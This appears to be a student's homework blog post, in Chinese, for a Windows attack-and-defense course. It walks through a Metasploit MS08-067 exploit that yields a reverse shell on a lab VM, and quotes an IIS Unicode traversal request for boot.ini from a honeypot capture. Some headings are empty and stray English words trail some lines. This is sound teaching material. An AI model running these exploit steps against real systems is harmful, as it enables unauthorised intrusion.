這個做業屬於哪一個課程 | https://edu.cnblogs.com/campus/besti/19attackdefense |
---|---|
這個做業的要求在哪裏 | https://edu.cnblogs.com/campus/besti/19attackdefense/homework/10612 |
我在這個課程的目標是 | ![]() |
這個做業在哪一個具體方面幫助我實現目標 | 熟悉瞭解Windows系統攻擊技術 |
做業正文 | 1.知識點梳理、2.實驗內容、3.學習感悟、思考等 |
其餘參考文獻 | 見正文最後部分 |
1.1 Windows操做系統的基本結構
Windows操做系統內核的基本模塊包括以下:html
Windows操做系統在用戶態的代碼模塊則包括以下:windows
1.2 Windows安全體系結構api
1.3 Windows 遠程安全攻防技術
目前Windows遠程攻擊技術能夠分爲如下幾大類:安全
1.4 windows本地安全攻防服務器
windows本地提權網絡
Windows敏感信息竊取tcp
windows消滅蹤影函數
windows遠程控制與後門程序工具
前置準備佈局
本次實驗用到了下面的虛擬機
第一個和第三個實踐要確保kali和win2k能夠正常互相ping通,網絡模式都調爲NAT,win2k以前手動設置的ip地址記得調成自動,dns也設置爲自動。第二個實踐要用老師上傳到雲班課的demo_NT_attack_data.zip做爲分析文件。
1: 在kali打開metasploit,輸入msfconsole
,回車後就會進入到他的控制檯界面,而後先搜索一下ms08_067漏洞,搜索結果以下圖。這是針對這個漏洞的滲透攻擊模塊。
search ms08_067 //search+漏洞名字 use exploit/windows/smb/ms08_067_netapi
2: 選擇攻擊負載模塊,能夠經過輸入show payloads
,而後找到你要用的攻擊負載模塊,我選了3,反轉tcp,注意,這一步必定要先show完payload,出現列表後在輸入下面的命令,或者直接輸入那個路徑也行。我以爲數字比較方便
set PAYLOAD 3
3: 而後show options
,查看須要配置的參數,主要是配置ip地址。按照靶機RHOST,攻擊機LHOST的原則配置就行,代碼格式以下:
set RHOST IP set LHOST IP
4: 設置目標操做系統平臺類型,這個選擇0就行,0表明自動識別
set TARGET 0
5: 輸入exploit
開始攻擊。攻擊結果以下圖
6: 攻擊成功後,敲下回車,發現進入了靶機的cmd頁面上,那咱們就輸入如下ipconfig查看一下靶機ip,這樣就驗證了咱們的攻擊是成功的。
1: 首先用wireshark打開那個.log文件。就會看到一大堆報文。大體掃一下,發現有不少http報文。這時候,不要方,先使用wireshark自帶的統計工具,看看這麼多的報文能濃縮成一些什麼東西。點擊統計
->http
->請求
。就會獲得下圖。咱們知道,訪問網頁的時候,會從網頁服務器下載不少文件到本地,從這個統計圖能夠看到。那個突出的一部分應該就是此次的攻擊代碼了。不過他這個統計圖的缺點是不按時間順序。而其餘的都是一些gif圖片。
2: 接下來就須要一步一步分析了。設置限定條件爲:ip.addr==172.16.1.106 and http
。而後就開始看。前邊的都大同小異。沒有特別突出的。到了編號爲117的這一行,以下圖。咱們發現了以下一段。
/guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini
這個boot.ini像是一個配置文件。查閱有關資料,咱們得知這是NT系統的啓動文件。而前面的..%c0af..啥的像是個路徑。查閱資料後得知,這是"/"的Unicode編碼。這是個IIS4和5存在的一個漏洞把。
3: 再往下看,咱們能夠看到攻擊者試圖向服務器獲取一個msadcs.dll文件。肯定他存在後,就開始幹壞事了。
4: 攻擊者利用這個dll存在RDS漏洞,輸入了個數據查詢語句進行SQL注入攻擊。根據ADM!ROX..以及那個mdb。咱們能夠經過谷歌查詢到它是經過rain
forest puppy編寫的msadc(2).pl滲透攻擊代碼發起的。
5: 而後攻擊者就成功進入了系統。往下拉,能夠看到到下圖所示位置,發生了變化。攻擊者創建了一個ftp鏈接。輸入了用戶名密碼,成沒成功我暫時還看不出。而後就是下載了幾個文件。
6: 而後攻擊者鏈接6969端口,得到了訪問權限
7: 從1369編號開始,攻擊機發起了屢次SQL注入攻擊,咱們發現數據部分不太同樣。什麼pdump.exe
yay.txt。這些文件暫時看不懂。
8: 而後在編號2339追蹤http流,咱們能夠看到,根據add,他應該是想提高權限。
9: 攻擊者應該警覺到了這是個蜜罐。還寫了一串英文表示他看透了這是個蜜罐,不過我還沒找到這條命令。先這樣吧。
防止這種攻擊應該及時打補丁。保持系統更新吧。
1: 攻擊步驟跟實踐1是同樣的,攻擊的漏洞依然是ms08_067
漏洞,這裏不在贅述了。咱們要作的就是在攻擊機輸入exploit
以後,敲回車以前,wireshark實時監聽通過網卡的數據包。因爲靶機沒有wireshark,因此我選擇用kali上的wireshark監聽。效果同樣的。
從下圖能夠看出攻擊者ip地址,端口,靶機ip地址,端口,時間等信息。
2: 上圖中前三個包是tcp三次握手包,創建鏈接後,從下圖中咱們發現攻擊機向靶機發了許多SMB協議包。而MS08-067漏洞是經過MSRPC
over
SMB通道調用Server服務程序中的NetPathCanonicalize函數時觸發的。因此據此能夠推斷出,是利用這個漏洞攻擊的
3: 而後這時候咱們在攻擊機輸入個ipconfig命令
4: 打開wireshark,查看剛剛捕獲到的包,咱們能夠從發的包的數據部分獲得咱們剛剛輸入的指令,以下圖。
至此,這個實驗就結束了。
Windows雖然已經發展了不少年,可是攻防並無結束,黑客和駭客之間的鬥爭不會停息。